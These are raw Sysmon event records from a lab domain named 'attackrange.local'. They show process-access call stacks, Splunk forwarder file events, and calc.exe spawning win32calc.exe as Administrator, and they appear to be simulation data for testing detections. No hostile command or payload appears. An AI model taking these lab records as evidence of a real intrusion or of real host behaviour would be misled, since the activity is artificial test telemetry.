23542300x80000000000000001055641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.651{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3050028EB693152E3F374A606F5CEB63,SHA256=ADCE834A55EFBD28008D56985585838576C569BC48CC2FCA03C49A2F7B63C09D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.648{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=70C5765D9B3839EE997C6F706A51766A,SHA256=01A729FBB645A4B842D3C3B8C31FD1B230E893B4D2B1E5B2241FAAE0F62D49C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.515{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.515{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.499{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.499{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.468{5EBD8912-8D29-6151-9400-00000000FD01}45644676C:\Windows\System32\calc.exe{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+3d433|C:\Windows\System32\SHELL32.dll+3d2fb|C:\Windows\System32\SHELL32.dll+3cc17|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000001055629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.461{5EBD8912-8D2A-6151-9700-00000000FD01}4736C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7,IMPHASH=83A6FF176255FE0F3F902360860DA5F8{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exeC:\Windows\System32\calc.exe 23542300x80000000000000001055628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.405{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396BF652F16D29325C8076E2D07C5E3E,SHA256=63B2414EC27C91CF205BBEB691F9233BE1F1E9FE2E702932DE5FAAA5CB9D94EF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.374{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.374{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:46.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ABE9C4BEC9B0C4BE0A6BB5C66051355,SHA256=D27FBE00D080E22E643F2C0A11C1471918BC866D84317EC6B97BD8B598BDCD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:46.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=891286582D2C197A11453D3816320DDD,SHA256=1C9A61D0688EB50F61BEC3402F8506F1E68C05BC7C3E5B1BC0E3E40A1B0A3609,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.171{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.171{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.171{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.108{5EBD8912-8D2A-6151-9500-00000000FD01}46044652C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+115046|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.077{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.077{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.077{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:46.061{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 